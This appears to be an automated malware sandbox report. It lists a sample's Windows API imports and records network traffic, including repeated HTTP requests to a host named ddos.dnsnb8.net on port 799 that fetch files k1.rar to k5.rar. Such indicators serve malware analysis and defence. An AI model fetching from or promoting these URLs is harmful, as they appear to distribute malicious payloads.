0x52e4f8 GetMenuDefaultItem
0x52e4fc SetMenuDefaultItem
0x52e500 UpdateLayeredWindow
0x52e504 EnableScrollBar
0x52e508 UnionRect
0x52e50c SetCursorPos
0x52e510 DrawFocusRect
0x52e514 DrawFrameControl
0x52e518 DrawEdge
0x52e51c DrawIconEx
0x52e520 UnpackDDElParam
0x52e524 ReuseDDElParam
0x52e528 InsertMenuItemW
0x52e530 UnregisterClassW
0x52e534 GetNextDlgGroupItem
0x52e538 InvalidateRgn
0x52e53c SetRect
0x52e540 CharNextW
0x52e544 EmptyClipboard
0x52e548 CloseClipboard
0x52e54c SetClipboardData
0x52e550 LoadImageW
0x52e554 DestroyIcon
0x52e558 CopyImage
0x52e55c OpenClipboard
0x52e560 DrawStateW
0x52e568 EnumChildWindows
0x52e56c LockWindowUpdate
0x52e570 BringWindowToTop
0x52e574 IsRectEmpty
0x52e578 KillTimer
0x52e57c InvalidateRect
0x52e580 IsMenu
0x52e584 SetClassLongW
0x52e588 SetParent
0x52e58c CreatePopupMenu
0x52e590 NotifyWinEvent
0x52e594 SetWindowRgn
0x52e59c LoadAcceleratorsW
0x52e5a4 GetAsyncKeyState
0x52e5a8 CharUpperW
0x52e5ac GetKeyboardState
0x52e5b0 GetKeyboardLayout
0x52e5b4 MapVirtualKeyW
0x52e5b8 ToUnicodeEx
0x52e5c0 PostThreadMessageW
0x52e5c4 GetSysColorBrush
0x52e5c8 SetRectEmpty
0x52e5cc DeleteMenu
0x52e5d0 WaitMessage
0x52e5d4 ReleaseCapture
0x52e5d8 LoadCursorW
0x52e5dc WindowFromPoint
0x52e5e0 SetCapture
0x52e5e4 EndPaint
0x52e5e8 GetWindowDC
0x52e5ec ReleaseDC
0x52e5f0 GetDC
0x52e5f4 ClientToScreen
0x52e5f8 GrayStringW
0x52e5fc DrawTextExW
0x52e600 DrawTextW
0x52e604 TabbedTextOutW
0x52e608 FillRect
0x52e60c InsertMenuW
0x52e610 RemoveMenu
0x52e614 GetMenuStringW
0x52e618 DestroyMenu
0x52e61c GetMenuItemInfoW
0x52e620 InflateRect
0x52e624 ShowWindow
0x52e628 SetWindowTextW
0x52e62c IsDialogMessageW
0x52e630 CheckDlgButton
0x52e638 SendDlgItemMessageW
0x52e63c SendDlgItemMessageA
0x52e640 IsChild
0x52e644 GetCapture
0x52e648 GetClassLongW
0x52e64c GetClassNameW
0x52e650 SetPropW
0x52e654 GetPropW
0x52e658 RemovePropW
0x52e65c SetFocus
0x52e664 GetWindowTextW
0x52e668 GetForegroundWindow
0x52e66c BeginDeferWindowPos
0x52e670 EndDeferWindowPos
0x52e674 GetTopWindow
0x52e678 UnhookWindowsHookEx
0x52e67c GetMessageTime
0x52e680 GetMessagePos
0x52e684 MapWindowPoints
0x52e688 ScrollWindow
0x52e68c TrackPopupMenu
0x52e690 SetMenu
0x52e694 SetScrollRange
0x52e698 GetScrollRange
0x52e69c SetScrollPos
0x52e6a0 GetScrollPos
0x52e6a4 SetForegroundWindow
0x52e6a8 ShowScrollBar
0x52e6ac UpdateWindow
0x52e6b0 GetMenuItemID
0x52e6b4 GetMenuItemCount
0x52e6b8 CreateWindowExW
0x52e6bc GetClassInfoExW
0x52e6c0 GetClassInfoW
0x52e6c4 RegisterClassW
0x52e6c8 GetSysColor
0x52e6cc AdjustWindowRectEx
0x52e6d0 ScreenToClient
0x52e6d4 EqualRect
0x52e6d8 DeferWindowPos
0x52e6dc GetScrollInfo
0x52e6e0 SetScrollInfo
0x52e6e4 SetWindowPlacement
0x52e6e8 GetDlgCtrlID
0x52e6ec DefWindowProcW
0x52e6f0 CallWindowProcW
0x52e6f4 CopyRect
0x52e6f8 PtInRect
0x52e6fc GetMenu
0x52e700 SetWindowLongW
0x52e704 IntersectRect
0x52e70c GetWindowPlacement
0x52e714 GetLastActivePopup
0x52e718 MessageBoxW
0x52e71c ShowOwnedPopups
0x52e720 SetCursor
0x52e724 SetWindowsHookExW
0x52e728 CallNextHookEx
0x52e72c GetMessageW
0x52e730 DefFrameProcW
0x52e734 DefMDIChildProcW
0x52e738 DrawMenuBar
0x52e740 FrameRect
0x52e744 GetUpdateRect
0x52e748 CharUpperBuffW
0x52e74c CopyIcon
0x52e750 SubtractRect
0x52e754 GetIconInfo
0x52e758 TranslateMessage
0x52e75c DispatchMessageW
0x52e760 IsWindowVisible
0x52e764 GetKeyState
0x52e768 PeekMessageW
0x52e76c GetCursorPos
0x52e770 ValidateRect
0x52e774 SetMenuItemBitmaps
0x52e77c LoadBitmapW
0x52e780 GetFocus
0x52e784 DestroyCursor
0x52e788 GetWindowRgn
0x52e78c CreateMenu
0x52e790 MoveWindow
0x52e794 GetDoubleClickTime
0x52e798 ModifyMenuW
0x52e79c GetMenuState
0x52e7a0 EnableMenuItem
0x52e7a4 CheckMenuItem
0x52e7a8 GetWindowRect
0x52e7ac LoadMenuW
0x52e7b0 GetSubMenu
0x52e7b4 GetDesktopWindow
0x52e7b8 GetActiveWindow
0x52e7bc SetActiveWindow
0x52e7c4 DestroyWindow
0x52e7c8 IsWindow
0x52e7cc GetWindowLongW
0x52e7d0 GetDlgItem
0x52e7d4 IsWindowEnabled
0x52e7d8 GetNextDlgTabItem
0x52e7dc EndDialog
0x52e7e0 GetWindow
0x52e7e8 GetParent
0x52e7ec MapDialogRect
0x52e7f0 SetWindowPos
0x52e7f4 WinHelpW
0x52e7fc OffsetRect
0x52e800 MessageBeep
0x52e804 RedrawWindow
0x52e808 IsZoomed
0x52e80c PostQuitMessage
0x52e810 PostMessageW
0x52e814 SetTimer
0x52e818 DrawIcon
0x52e81c GetClientRect
0x52e820 GetSystemMetrics
0x52e824 IsIconic
0x52e828 SendMessageW
0x52e82c AppendMenuW
0x52e830 GetSystemMenu
0x52e834 LoadIconW
0x52e838 EnableWindow
0x52e83c BeginPaint
Library GDI32.dll:
0x52e050 DeleteObject
0x52e054 SelectClipRgn
0x52e058 CreateRectRgn
0x52e05c GetViewportExtEx
0x52e060 GetWindowExtEx
0x52e064 GetPixel
0x52e068 PtVisible
0x52e06c RectVisible
0x52e070 TextOutW
0x52e074 Escape
0x52e078 SelectObject
0x52e07c SetViewportOrgEx
0x52e080 OffsetViewportOrgEx
0x52e084 SetViewportExtEx
0x52e088 ScaleViewportExtEx
0x52e08c SetWindowOrgEx
0x52e090 OffsetWindowOrgEx
0x52e094 SetWindowExtEx
0x52e098 ScaleWindowExtEx
0x52e09c ExtSelectClipRgn
0x52e0a0 DeleteDC
0x52e0a4 CreatePatternBrush
0x52e0a8 GetStockObject
0x52e0ac SelectPalette
0x52e0b0 GetObjectType
0x52e0b4 CreatePen
0x52e0b8 CreateSolidBrush
0x52e0bc CreateHatchBrush
0x52e0c4 OffsetRgn
0x52e0c8 SetTextColor
0x52e0cc GetRgnBox
0x52e0d0 CreateDIBitmap
0x52e0d8 GetTextMetricsW
0x52e0dc EnumFontFamiliesW
0x52e0e0 GetTextCharsetInfo
0x52e0e4 CreateRoundRectRgn
0x52e0e8 GetTextColor
0x52e0ec PatBlt
0x52e0f0 GetDIBits
0x52e0f4 RealizePalette
0x52e0f8 CombineRgn
0x52e0fc StretchBlt
0x52e100 SetPixel
0x52e104 CreateDIBSection
0x52e108 GetBkColor
0x52e10c SetRectRgn
0x52e110 GetMapMode
0x52e114 DPtoLP
0x52e118 CreateEllipticRgn
0x52e11c CreatePolygonRgn
0x52e120 Polyline
0x52e124 Ellipse
0x52e128 Polygon
0x52e12c Rectangle
0x52e130 RoundRect
0x52e134 CreatePalette
0x52e138 GetPaletteEntries
0x52e13c GetWindowOrgEx
0x52e140 PtInRegion
0x52e144 FillRgn
0x52e148 FrameRgn
0x52e14c GetBoundsRect
0x52e150 GetViewportOrgEx
0x52e154 LPtoDP
0x52e158 ExtFloodFill
0x52e15c SetPaletteEntries
0x52e168 EnumFontFamiliesExW
0x52e16c GetTextFaceW
0x52e170 SetPixelV
0x52e174 SetTextAlign
0x52e178 MoveToEx
0x52e17c LineTo
0x52e180 IntersectClipRect
0x52e184 ExcludeClipRect
0x52e188 SetMapMode
0x52e18c SetROP2
0x52e190 SetPolyFillMode
0x52e194 SetBkMode
0x52e198 RestoreDC
0x52e19c SaveDC
0x52e1a0 CopyMetaFileW
0x52e1a4 GetDeviceCaps
0x52e1ac ExtTextOutW
0x52e1b0 BitBlt
0x52e1b4 CreateCompatibleDC
0x52e1b8 CreateFontIndirectW
0x52e1bc GetObjectW
0x52e1c0 GetClipBox
0x52e1c4 GetDCOrgEx
0x52e1c8 SetDIBColorTable
0x52e1cc CreateBitmap
0x52e1d0 SetBkColor
Library MSIMG32.dll:
0x52e460 TransparentBlt
0x52e464 AlphaBlend
Library COMDLG32.dll:
0x52e048 GetFileTitleW
Library WINSPOOL.DRV:
0x52e84c ClosePrinter
0x52e850 OpenPrinterW
0x52e854 DocumentPropertiesW
Library ADVAPI32.dll:
0x52e000 RegEnumKeyExW
0x52e00c RegCloseKey
0x52e010 RegQueryValueExW
0x52e014 RegOpenKeyExW
0x52e018 RegCreateKeyExW
0x52e01c RegSetValueExW
0x52e020 RegDeleteValueW
0x52e024 RegDeleteKeyW
0x52e028 OpenProcessToken
0x52e02c RegQueryValueW
0x52e030 RegOpenKeyW
0x52e034 RegEnumKeyW
Library SHELL32.dll:
0x52e4ac DragQueryFileW
0x52e4b4 SHBrowseForFolderW
0x52e4b8 ShellExecuteW
0x52e4bc SHAppBarMessage
0x52e4c0 DragFinish
0x52e4c4 SHGetFileInfoW
Library COMCTL32.dll:
Library SHLWAPI.dll:
0x52e4cc PathFindExtensionW
0x52e4d0 PathFindFileNameW
0x52e4d4 PathStripToRootW
0x52e4d8 PathIsUNCW
0x52e4dc PathFileExistsA
0x52e4e0 PathRemoveFileSpecW
Library oledlg.dll:
0x52e92c OleUIBusyW
Library ole32.dll:
0x52e8ac CoInitializeEx
0x52e8b0 CoUninitialize
0x52e8b4 OleInitialize
0x52e8bc OleUninitialize
0x52e8c0 OleGetClipboard
0x52e8c4 DoDragDrop
0x52e8c8 OleFlushClipboard
0x52e8dc CoGetClassObject
0x52e8e4 OleDuplicateData
0x52e8e8 CoTaskMemAlloc
0x52e8ec ReleaseStgMedium
0x52e8f0 CoTaskMemFree
0x52e8f4 CLSIDFromString
0x52e8f8 CLSIDFromProgID
0x52e8fc IsAccelerator
0x52e904 CoRevokeClassObject
0x52e908 RevokeDragDrop
0x52e910 RegisterDragDrop
0x52e914 CoCreateInstance
0x52e920 OleLockRunning
Library OLEAUT32.dll:
0x52e46c VariantCopy
0x52e470 SafeArrayDestroy
0x52e480 SysAllocString
0x52e484 SysStringLen
0x52e488 VariantInit
0x52e48c VariantChangeType
0x52e490 VariantClear
0x52e494 SysAllocStringLen
0x52e498 SysFreeString
Library gdiplus.dll:
0x52e85c GdipDrawImageI
0x52e864 GdiplusShutdown
0x52e868 GdiplusStartup
0x52e870 GdipBitmapLockBits
0x52e880 GdipGetImagePalette
0x52e88c GdipGetImageHeight
0x52e890 GdipGetImageWidth
0x52e894 GdipDisposeImage
0x52e898 GdipDeleteGraphics
0x52e89c GdipAlloc
0x52e8a0 GdipFree
0x52e8a4 GdipCloneImage
Library IMM32.dll:
0x52e1d8 ImmGetOpenStatus
0x52e1dc ImmReleaseContext
0x52e1e0 ImmGetContext
Library WINMM.dll:
0x52e844 PlaySoundW

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k3.rar 
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k5.rar 
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k4.rar 
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.